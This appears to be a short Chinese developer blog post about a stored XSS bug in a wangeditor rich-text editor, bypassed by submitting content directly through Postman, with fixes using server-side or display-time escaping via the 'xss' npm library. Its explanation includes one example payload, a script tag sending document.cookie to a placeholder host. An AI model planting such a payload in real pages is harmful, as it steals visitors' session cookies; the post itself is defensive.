bug-xss 攻击漏洞问题

XSS 攻击漏洞是什么

XSS(Cross-Site Scripting)攻击:通过在网站上植入恶意脚本来攻击用户

举例说明

在留言板发布评论,评论内容包含恶意脚本:

javascript 复制代码
<script>document.location = "http://xxx.com/getCookie?cookie=" + document.cookie;</script>

当用户看到评论时,就会触发响应,将用户cookie发送到攻击者手中

问题描述

前端使用wangeditor富文本编辑器,正常情况下编辑器都会把内容进行转码处理,转码之后就回避xss问题,这次的问题是通过一些手段提及内容(比如postman),这样提交的代码就没有经过编辑器进行转码,读取数据时就会触发恶意代码。

解决方法

  1. 方法一:后端拿到数据后,再进行一次转码,保障进入数据库的内容是转码后的;
  2. 方法二:读取后端数据后,对要展示的数据再进行一次转码,相当于保存和读取都进行转码。

转码工具

https://jsxss.com/zh/index.html

javascript 复制代码
// 安装
npm i xss
// 引用
import filterXSS from 'xss'
const newStr=filterXSS(htmlStr); // 进行转码
相关推荐
kyle~1 小时前
C++--- override 关键字 强制编译器验证当前函数是否重写基类的虚函数
java·前端·c++
Light601 小时前
像素退场,曲线登场:现代响应式 CSS 全家桶 | 领码课堂
前端·css·响应式设计·css函数·布局系统·相对单位·设计令牌
workflower1 小时前
Fundamentals of Architectural Styles and patterns
开发语言·算法·django·bug·结对编程
爱生活的苏苏2 小时前
elementUI 表单验证-联动型校验
前端·javascript·elementui
一只小风华~4 小时前
Vue Router 路由元信息(meta)详解
前端·javascript·vue.js
*且听风吟4 小时前
html 实现鼠标滑动点亮横轴
前端·javascript·html
iCoding915 小时前
前端分页 vs 后端分页:技术选型
前端·后端·系统架构
mingtianyihou336 小时前
使用 Service Worker 限制请求并发数
前端
张可爱6 小时前
20251017-Vue2八股文整理(上篇)
前端
FanetheDivine6 小时前
ts中如何描述一个复杂函数的类型
前端·typescript